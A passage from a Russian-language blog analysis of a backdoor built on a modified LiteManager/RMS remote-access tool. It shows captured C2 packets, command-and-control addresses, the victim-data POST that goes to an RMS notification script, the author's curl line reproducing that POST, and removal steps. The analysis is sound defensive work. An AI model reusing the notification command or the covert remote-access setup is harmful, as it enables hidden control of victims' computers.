\u0432\u0435\u0441\u044c\u043c\u0430 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u043a\u043b\u044e\u0447:<br \/>  <code>HKCU\\Software\\<b>LiteManagerTeam<\/b>\\<b>LiteManager<\/b>\\v3.4\\Config\\ServerExe<\/code><br \/>  \u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0432 \u044d\u0442\u043e\u0442 \u043a\u043b\u044e\u0447 \u043f\u0443\u0442\u044c \u043a \u0441\u0435\u0431\u0435, \u043b\u044e\u0431\u0438\u043c\u043e\u043c\u0443.<br \/>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/9b5\/0ec\/d09\/9b50ecd0943144ab8fac062f2dca636f.png\"\/><\/p>\n<p>  \u0418\u0437 \u0447\u0435\u0433\u043e \u044f \u0434\u0435\u043b\u0430\u044e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u0447\u0442\u043e \u0438\u043c\u0435\u044e \u0434\u0435\u043b\u043e \u0441 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043e\u0439 LiteManager: \u0438\u0434\u0443 \u043d\u0430 <a href=\"http:\/\/litemanager.ru\/\">\u0441\u0430\u0439\u0442 LiteManager<\/a> \u0438 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u044e <a href=\"http:\/\/litemanager.ru\/soft\/download.php?get=litemanager_4.7.2_ru.zip\">\u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432 \u0434\u043b\u044f Windows<\/a>. \u041e\u0431\u0440\u0430\u0442\u0438\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435: \u043e\u043d \u0432\u0435\u0440\u0441\u0438\u0438 4.7.2 \u2014 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442?<\/p>\n<p>  \u0420\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u044b\u0432\u0430\u044e \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432 \u0438 \u0432\u044b\u0442\u0430\u0441\u043a\u0438\u0432\u0430\u044e \u0438\u0437 \u043d\u0435\u0433\u043e \u0444\u0430\u0439\u043b \u0441\u0435\u0440\u0432\u0435\u0440\u0430: romserver.exe. \u041e\u0442\u043a\u0440\u044b\u0432\u0430\u044e \u043e\u043a\u043e\u0448\u043a\u043e \u0441 \u0435\u0433\u043e \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438:<br \/>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/d7b\/f6f\/6aa\/d7bf6f6aa0524677acbdde9d5027a79c.png\"\/><\/p>\n<p>  \u0414\u0430, \u043e\u0447\u0435\u043d\u044c \u043f\u043e\u0445\u043e\u0436\u0435: \u0442\u0430 \u0436\u0435 \u0438\u043a\u043e\u043d\u043a\u0430, \u0442\u0435 \u0436\u0435 \u0432\u0435\u0440\u0441\u0438\u0438, \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0430\u043c\u0443\u044e \u043c\u0430\u043b\u043e\u0441\u0442\u044c \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0437\u043c\u0435\u0440 \u0438 \u0435\u0441\u0442\u044c \u0446\u0438\u0444\u0440\u043e\u0432\u0430\u044f \u043f\u043e\u0434\u043f\u0438\u0441\u044c. \u041e\u0447\u0435\u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0444\u0430\u0439\u043b \u00ab\u0434\u043e\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0438 \u043d\u0430\u043f\u0438\u043b\u044c\u043d\u0438\u043a\u043e\u043c\u00bb, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u043c \u0432\u0438\u0434\u0435 \u043e\u043d \u043d\u0435 \u0441\u043e\u0432\u0441\u0435\u043c \u0443\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u043b \u0437\u043b\u043e\u0434\u0435\u0435\u0432. \u041c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043a\u0430\u043a-\u043d\u0438\u0431\u0443\u0434\u044c \u0432\u044b\u0434\u0430\u0432\u0430\u043b \u0441\u0432\u043e\u0451 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u2014 \u0447\u0442\u043e \u0431\u044b\u043b\u043e \u0441\u043e\u0432\u0441\u0435\u043c \u043b\u0438\u0448\u043d\u0438\u043c. \u041e\u0434\u043d\u0430\u043a\u043e \u0442\u043e, \u0447\u0442\u043e \u0444\u0430\u0439\u043b \u0431\u044b\u043b \u0438\u0437\u043c\u0435\u043d\u0451\u043d, \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u043e \u043d\u0435 \u043d\u0430\u043f\u0440\u044f\u0433\u0430\u0435\u0442 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u044b: \u043d\u0430 Virustotal-\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u043d\u0438\u0445 \u043f\u0440\u043e\u0441\u0442\u043e \u043c\u043e\u043b\u0447\u0438\u0442 \u0438 \u043b\u0438\u0448\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, \u0447\u0442\u043e \u044d\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u043e RiskWare.<\/p>\n<p>  \u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u043c. \u0422\u0435\u043f\u0435\u0440\u044c \u044f \u0431\u0443\u0434\u0443 \u0438\u0437\u0443\u0447\u0430\u0442\u044c \u043b\u043e\u0433 WireShark.<\/p>\n<p>  \u041f\u0435\u0440\u0432\u044b\u043c \u0434\u0435\u043b\u043e\u043c ctfmon.exe \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u0441 \u0430\u0434\u0440\u0435\u0441\u043e\u043c 91.240.86.200. \u041f\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u043a\u0430\u043d\u0430\u043b\u0443 \u0432\u0437\u0430\u0434-\u0432\u043f\u0435\u0440\u0451\u0434 \u0431\u0435\u0433\u0430\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439, \u0441\u043b\u0435\u0434\u043e\u043c \u0437\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 ctfmon.exe \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 \u043f\u0430\u043a\u0435\u0442:  <\/p>\n<pre><code class=\"xml\">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt; &lt;rom_sever_client_settings version=&quot;4722&quot;&gt;  &lt;id&gt;180185&lt;\/id&gt;  &lt;internal_id&gt;9017511&lt;\/internal_id&gt;  &lt;noip_number&gt;-1&lt;\/noip_number&gt;  &lt;license&gt;false&lt;\/license&gt;  &lt;host&gt;&lt;\/host&gt;  &lt;port&gt;5650&lt;\/port&gt;  &lt;redirected&gt;false&lt;\/redirected&gt;  &lt;server_ver&gt;4722&lt;\/server_ver&gt;  &lt;remotehideserverresub&gt;false&lt;\/remotehideserverresub&gt;  &lt;connectid&gt;1195251490&lt;\/connectid&gt;  &lt;protect_code&gt;0&lt;\/protect_code&gt; &lt;\/rom_sever_client_settings&gt; <\/code><\/pre>\n<p>  \u041f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044e \u043d\u0430 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u0433\u043e\u043b\u043e\u0432\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 LiteManager.<br \/>  \u0417\u0430\u0442\u0435\u043c \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043e\u043f\u044f\u0442\u044c \u0438\u0434\u0451\u0442 \u043e\u0431\u043c\u0435\u043d \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u043c\u0438 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438, \u0437\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442 \u0435\u0449\u0451 \u043e\u0434\u0438\u043d \u043f\u0430\u043a\u0435\u0442:  <\/p>\n<pre><code class=\"xml\">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt; &lt;rom_noip_client_settings version=&quot;4725&quot;&gt;  &lt;host&gt;83.240.218.170&lt;\/host&gt;  &lt;port&gt;5651&lt;\/port&gt;  &lt;max_connections&gt;30&lt;\/max_connections&gt;  &lt;cur_connections&gt;0&lt;\/cur_connections&gt;  &lt;ip_filter&gt;false&lt;\/ip_filter&gt;  &lt;id_filter&gt;false&lt;\/id_filter&gt;  &lt;mac_filter&gt;false&lt;\/mac_filter&gt;  &lt;caption&gt;&lt;\/caption&gt;  &lt;description&gt;&lt;\/description&gt;  &lt;no_ip_type&gt;1&lt;\/no_ip_type&gt;  &lt;license&gt;1&lt;\/license&gt;  &lt;number&gt;409&lt;\/number&gt;  &lt;internalID&gt;2801665&lt;\/internalID&gt;  &lt;NoIPSelf&gt;false&lt;\/NoIPSelf&gt;  &lt;ver&gt;4724&lt;\/ver&gt; &lt;\/rom_noip_client_settings&gt; <\/code><\/pre>\n<p>  \u042d\u0442\u043e \u0443\u0436\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0435\u0439. \u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043a\u043b\u0438\u0435\u043d\u0442 LiteManager \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0442\u044c\u0441\u044f \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u043d\u0435 \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e, \u0430 \u0447\u0435\u0440\u0435\u0437 \u0442\u0440\u0435\u0442\u0438\u0439 \u0443\u0437\u0435\u043b \u2014 \u0442\u0430\u043a \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u044b\u0439 <a href=\"http:\/\/litemanager.ru\/support\/Knowledgebase_ru\/instr_noip\/\">NoIPServer<\/a>. \u041d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u044d\u0442\u043e\u043c \u043c\u043e\u0436\u0435\u0442 \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u0443\u0442\u044c \u0432 \u0441\u043b\u0443\u0447\u0430\u0435, \u0435\u0441\u043b\u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0441\u043f\u0440\u044f\u0442\u0430\u043d \u043e\u0442 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0437\u0430 \u043a\u0430\u043a\u0438\u043c\u0438-\u043d\u0438\u0431\u0443\u0434\u044c \u0444\u0430\u0435\u0440\u0432\u043e\u043b\u0430\u043c\u0438\/\u043d\u0430\u0442\u0430\u043c\u0438 \u0438 \u0442.\u043f. \u0414\u043b\u044f \u0437\u043b\u043e\u0434\u0435\u0435\u0432 \u0436\u0435 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0442\u0440\u0435\u0442\u044c\u0435\u0433\u043e \u0443\u0437\u043b\u0430 \u2014 \u043f\u0440\u0435\u043a\u0440\u0430\u0441\u043d\u044b\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u0430\u043d\u043e\u043d\u0438\u043c\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u2014 \u0441\u043a\u0440\u044b\u0442\u044c \u0441\u0432\u043e\u0439 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0439 IP \u043e\u0442 \u043f\u043e\u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u0445 \u0433\u043b\u0430\u0437. \u0414\u0430\u043d\u043d\u044b\u0439 \u043f\u0430\u043a\u0435\u0442 \u043a\u0430\u043a \u0440\u0430\u0437 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0443\u043a\u0430\u0437\u0430\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0443 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0447\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0434\u0430\u043b\u044c\u0448\u0435 (\u0430\u0434\u0440\u0435\u0441 \u0438 \u043f\u043e\u0440\u0442 NoIPServer-\u0430).<\/p>\n<p>  \u0421\u043c\u043e\u0442\u0440\u0438\u043c \u0434\u0430\u043b\u044c\u0448\u0435. \u0422\u0443\u0442 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435! \u0421\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u044d\u0442\u043e\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430 ctfmon.exe \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 htt\u0440:\/\/rmansys.ru\/utils\/inet_id_notify.php \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 POST-\u0437\u0430\u043f\u0440\u043e\u0441:<br \/>  <code>----------162747236742480<br \/>  Content-Disposition: form-data; name=&quot;email&quot;<br \/>  Content-Type: text\/html; charset=&quot;UTF-8&quot;<br \/>  Content-Transfer-Encoding: binary<\/p>\n<p>  blackcc019@gmail.com<br \/>  ----------162747236742480<br \/>  Content-Disposition: form-data; name=&quot;user_name&quot;<br \/>  Content-Type: text\/html; charset=&quot;UTF-8&quot;<br \/>  Content-Transfer-Encoding: binary<\/p>\n<p>  Dima<br \/>  ----------162747236742480<br \/>  Content-Disposition: form-data; name=&quot;comp_name&quot;<br \/>  Content-Type: text\/html; charset=&quot;UTF-8&quot;<br \/>  Content-Transfer-Encoding: binary<\/p>\n<p>  DIMA-\u041f\u041a<br \/>  ----------162747236742480<br \/>  Content-Disposition: form-data; name=&quot;id&quot;<br \/>  Content-Type: text\/html; charset=&quot;UTF-8&quot;<br \/>  Content-Transfer-Encoding: binary<\/p>\n<p>  180185<br \/>  ----------162747236742480<br \/>  Content-Disposition: form-data; name=&quot;lang_id&quot;<br \/>  Content-Type: text\/html; charset=&quot;UTF-8&quot;<br \/>  Content-Transfer-Encoding: binary<\/p>\n<p>  1049<br \/>  ----------162747236742480<br \/>  Content-Disposition: form-data; name=&quot;product&quot;<br \/>  Content-Type: text\/html; charset=&quot;UTF-8&quot;<br \/>  Content-Transfer-Encoding: binary<\/p>\n<p>  RMS<br \/>  ----------162747236742480--<br \/>  <\/code><br \/>  \u041d\u0430 \u0447\u0442\u043e \u044d\u0442\u043e \u043f\u043e\u0445\u043e\u0436\u0435? \u042d\u0442\u043e \u043f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e ctfmon \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043a\u0440\u0438\u043f\u0442\u0430 inet_id_notify.php \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u043d\u0430 email \u0445\u043e\u0437\u044f\u0438\u043d\u0430 blackcc019@gmail.com \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043a \u0438\u043d\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443.<\/p>\n<p>  \u0414\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u044d\u0442\u043e\u0439 \u0433\u0438\u043f\u043e\u0442\u0435\u0437\u044b \u044f \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0441\u043e \u0441\u0432\u043e\u0435\u0433\u043e Debian-\u0441\u0435\u0440\u0432\u0435\u0440\u0430:  <\/p>\n<pre><code class=\"bash\">curl --data &quot;email=\u043c\u043e\u0439_\u044f\u0449\u0438\u043a&user_name=user1&comp_name=pc1&id=12345&lang_id=1049&product=RMS&quot; http:\/\/rmansys.ru\/utils\/inet_id_notify.php <\/code><\/pre>\n<p>  \u041f\u0440\u043e\u0432\u0435\u0440\u044f\u044e \u043f\u043e\u0447\u0442\u0443 \u2014 \u0432\u0443\u0430\u043b\u044f!<br \/>  \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u043e \u043f\u0438\u0441\u044c\u043c\u043e \u0441 \u0430\u0434\u0440\u0435\u0441\u0430 &#8216;TektonIT Corp. &lt;info@tektonit.com&gt;&#8217;<br \/>  \u0422\u0435\u043c\u0430 \u043f\u0438\u0441\u044c\u043c\u0430: &#8216;Remote Manipulator System \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435, \u043d\u043e\u0432\u044b\u0439 Internet-ID \u043f\u043e\u043b\u0443\u0447\u0435\u043d: 12345&#8217;<br \/>  \u0422\u0435\u043a\u0441\u0442 \u043f\u0438\u0441\u044c\u043c\u0430:<br \/>  <code>\u0414\u043e\u0431\u0440\u044b\u0439 \u0434\u0435\u043d\u044c.<\/p>\n<p>  \u0421\u043e\u043e\u0431\u0449\u0430\u0435\u043c, \u0447\u0442\u043e \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u0438 \u0437\u0430\u043f\u0443\u0449\u0435\u043d Remote Manipulator System, \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043d \u043d\u043e\u0432\u044b\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 &quot;Internet-ID&quot;.<\/p>\n<p>  ID: 12345<\/p>\n<p>  \u0418\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f: user1<br \/>  \u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430: pc1<\/p>\n<p>  \u0414\u0430\u043d\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.<br \/>  \u0412\u043d\u0438\u043c\u0430\u043d\u0438\u0435! \u0421\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u0435 \u0434\u0430\u043d\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u0432 \u043d\u0430\u0434\u0435\u0436\u043d\u043e\u043c \u043c\u0435\u0441\u0442\u0435 \u0438\u043b\u0438 \u0443\u0434\u0430\u043b\u0438\u0442\u0435, \u0442.\u043a. \u043e\u043d\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0443\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443.<\/p>\n<p>  \u0421\u0430\u0439\u0442: http:\/\/rmansys.ru\/<br \/>  \u0421\u043b\u0443\u0436\u0431\u0430 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438: support@tektonit.com<br \/>  TektonIT Corp.<br \/>  <\/code><br \/>  \u0412\u0441\u0451 \u043f\u043e\u043d\u044f\u0442\u043d\u043e. \u0413\u043e\u0441\u043f\u043e\u0434\u0430 \u0441 rmansys.ru \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0445\u0430\u043a\u0435\u0440\u0430\u043c \u043e\u0442\u043b\u0438\u0447\u043d\u0443\u044e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043d\u0443\u0436\u043d\u0443\u044e \u0438\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0447\u0435\u0440\u0435\u0437 \u0442\u0430\u043a\u043e\u0439 \u0432\u043e\u0442 \u0441\u0432\u043e\u0435\u043e\u0431\u0440\u0430\u0437\u043d\u044b\u0439 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0440\u0435\u043b\u0435\u0439. \u041c\u043e\u043b\u043e\u0434\u0446\u044b, \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0441\u043a\u0430\u0436\u0435\u0448\u044c.<\/p>\n<p>  \u0417\u0430\u0442\u0435\u043c ctfmon.exe, \u043a\u0430\u043a \u0435\u043c\u0443 \u0431\u044b\u043b\u043e \u0438 \u0443\u043a\u0430\u0437\u0430\u043d\u043e, \u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0435\u0442\u0441\u044f \u0441 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u043c \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 83.240.218.170:5651 \u0438 \u0432\u0440\u0435\u043c\u044f \u043e\u0442 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043e\u0431\u043c\u0435\u043d\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0441 \u043d\u0438\u043c \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u043c\u0438 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u2014 \u0436\u0434\u0451\u0442 \u0432\u0445\u043e\u0434\u0430 \u0445\u043e\u0437\u044f\u0438\u043d\u0430.<\/p>\n<p>  \u041d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u0434\u0430\u043b\u044c\u0448\u0435 \u0441\u043c\u044b\u0441\u043b\u0430 \u043e\u0441\u043e\u0431\u043e\u0433\u043e \u043d\u0435 \u0431\u044b\u043b\u043e: \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043f\u043e\u043d\u044f\u0442\u0435\u043d.<\/p>\n<h2>\u0427\u0430\u0441\u0442\u044c \u043f\u044f\u0442\u0430\u044f: \u043b\u0435\u0447\u0435\u043d\u0438\u0435<\/h2>\n<p>  \u0423\u0434\u0430\u043b\u0438\u0442\u044c \u044d\u0442\u0443 \u0438\u043d\u0444\u0435\u043a\u0446\u0438\u044e \u0432\u0435\u0441\u044c\u043c\u0430 \u043d\u0435 \u0441\u043b\u043e\u0436\u043d\u043e (\u0435\u0441\u043b\u0438, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, \u0432\u0430\u043c \u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043d\u0435 \u0443\u0441\u043f\u0435\u043b\u0438 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u043d\u0430\u0441\u043e\u0432\u0430\u0442\u044c \u0435\u0449\u0451 \u043a\u0430\u043a\u043e\u0439-\u043d\u0438\u0431\u0443\u0434\u044c \u0432\u0438\u0440\u0443\u0441\u043d\u0438). \u041d\u0443\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0448\u0430\u0433\u0438:<\/p>\n<ul>\n<li>\u0422\u0435\u0440\u043c\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u0447\u0435\u0440\u0435\u0437 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440 \u0437\u0430\u0434\u0430\u0447. \u041d\u0430\u0437\u044b\u0432\u0430\u0442\u044c\u0441\u044f, \u043a\u0441\u0442\u0430\u0442\u0438, \u043e\u043d \u043c\u043e\u0436\u0435\u0442 \u0438 \u043f\u043e \u0434\u0440\u0443\u0433\u043e\u043c\u0443.<\/li>\n<li>\u0423\u0434\u0430\u043b\u0438\u0442\u044c \u0441\u043b\u0443\u0436\u0431\u0443 \u0441\u0435\u0440\u0432\u0435\u0440\u0430: \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0432 \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0443: <b>sc delete ROMService_Support<\/b>.<\/li>\n<li>\u0423\u0434\u0430\u043b\u0438\u0442\u044c \u043f\u0430\u043f\u043a\u0443 &quot;%appdata%\\MicrocoftUpdate\\&quot; \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u0432 \u043d\u0435\u0439.<\/li>\n<li>\u0412\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0432 \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u043a\u043b\u044e\u0447 \u00abHKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\u00bb: \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0432 \u043d\u0435\u0433\u043e \u0441\u0442\u0440\u043e\u043a\u0443 \u00abexplorer.exe\u00bb.<\/li>\n<li>\u041f\u0440\u043e\u0439\u0442\u0438\u0441\u044c \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u0440\u0435\u0435\u0441\u0442\u0440\u0443 \u0432 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043a\u043b\u044e\u0447\u0435\u0439, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u0441\u043b\u043e\u0432\u043e \u00abMicrocoft\u00bb \u0438 \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0438\u0445.<\/li>\n<li>\u041f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440.<\/li>\n<\/ul>\n<p>  \u041a\u0430\u043a \u043f\u0440\u0435\u0432\u0435\u043d\u0442\u0438\u0432\u043d\u043e \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f \u043e\u0442 \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u044f? \u041e\u0442 \u0434\u0430\u043d\u043d\u043e\u0439 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0439 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \u0432 \u0444\u0430\u0439\u043b hosts \u0441\u0442\u0440\u043e\u043a\u0443 \u00ab127.0.0.1 rmansys.ru\u00bb \u2014 \u0442\u043e\u0433\u0434\u0430 \u0431\u044d\u043a\u0434\u043e\u0440 \u043d\u0435 \u0441\u043c\u043e\u0436\u0435\u0442 